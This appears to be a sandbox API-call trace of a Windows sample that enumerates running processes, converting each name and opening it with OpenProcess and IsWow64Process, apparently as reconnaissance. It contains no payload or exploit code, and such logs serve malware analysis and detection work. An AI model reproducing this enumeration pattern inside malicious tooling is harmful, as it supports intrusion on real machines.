	[0097.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.585] CloseHandle (hObject=0x248) returned 1
	[0097.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.585] CloseHandle (hObject=0x248) returned 1
	[0097.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0097.671] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ac98, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.678] CloseHandle (hObject=0x248) returned 1
	[0097.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.679] CloseHandle (hObject=0x248) returned 1
	[0097.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658e68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.679] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.679] CloseHandle (hObject=0x248) returned 1
	[0097.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.679] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.680] CloseHandle (hObject=0x248) returned 1
	[0097.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.680] CloseHandle (hObject=0x248) returned 1
	[0097.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.680] CloseHandle (hObject=0x248) returned 1
	[0097.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.681] CloseHandle (hObject=0x248) returned 1
	[0097.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.681] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.681] CloseHandle (hObject=0x248) returned 1
	[0097.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.681] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.681] CloseHandle (hObject=0x248) returned 1
	[0097.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.682] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.682] CloseHandle (hObject=0x248) returned 1
	[0097.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.682] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.682] CloseHandle (hObject=0x248) returned 1
	[0097.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658f68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.682] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.682] CloseHandle (hObject=0x248) returned 1
	[0097.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.683] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.683] CloseHandle (hObject=0x248) returned 1
	[0097.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.683] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.683] CloseHandle (hObject=0x248) returned 1
	[0097.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.683] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.683] CloseHandle (hObject=0x248) returned 1
	[0097.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.684] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.684] CloseHandle (hObject=0x248) returned 1
	[0097.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.684] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.684] CloseHandle (hObject=0x248) returned 1
	[0097.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.684] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.684] CloseHandle (hObject=0x248) returned 1
	[0097.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.684] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.685] CloseHandle (hObject=0x248) returned 1
	[0097.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.685] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.685] CloseHandle (hObject=0x248) returned 1
	[0097.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658e68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.685] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.685] CloseHandle (hObject=0x248) returned 1
	[0097.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.685] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.686] CloseHandle (hObject=0x248) returned 1
	[0097.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.686] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.686] CloseHandle (hObject=0x248) returned 1
	[0097.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.686] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.686] CloseHandle (hObject=0x248) returned 1
	[0097.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.686] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.686] CloseHandle (hObject=0x248) returned 1
	[0097.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.687] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.687] CloseHandle (hObject=0x248) returned 1
	[0097.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658f68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.687] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.687] CloseHandle (hObject=0x248) returned 1
	[0097.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.687] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.687] CloseHandle (hObject=0x248) returned 1
	[0097.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658e68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.688] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.688] CloseHandle (hObject=0x248) returned 1
